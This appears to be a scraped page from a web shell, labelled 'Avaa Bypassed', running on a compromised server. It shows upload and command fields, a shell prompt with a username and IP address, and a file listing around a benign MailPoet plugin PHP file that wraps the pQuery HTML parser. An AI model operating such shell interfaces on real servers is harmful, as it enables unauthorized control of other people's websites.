[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.14.248.199: ~ $
<?php

namespace MailPoet\Util\pQuery;

if (!defined('ABSPATH')) exit;


// extend pQuery class to use UTF-8 encoding when getting elements' inner/outer text
// phpcs:ignore Squiz.Classes.ValidClassName
class pQuery extends \pQuery {
  public static function parseStr($html) {
    $parser = new Html5Parser($html);

    if (!$parser->root instanceof \pQuery\DomNode) {
      // this condition shouldn't happen it is here only for PHPStan
      throw new \Exception('Renderer is not configured correctly');
    }

    return $parser->root;
  }
}

Filemanager

Name Type Size Permission Actions
DomNode.php File 409 B 0644
Html5Parser.php File 208 B 0644
index.php File 0 B 0644
pQuery.php File 545 B 0644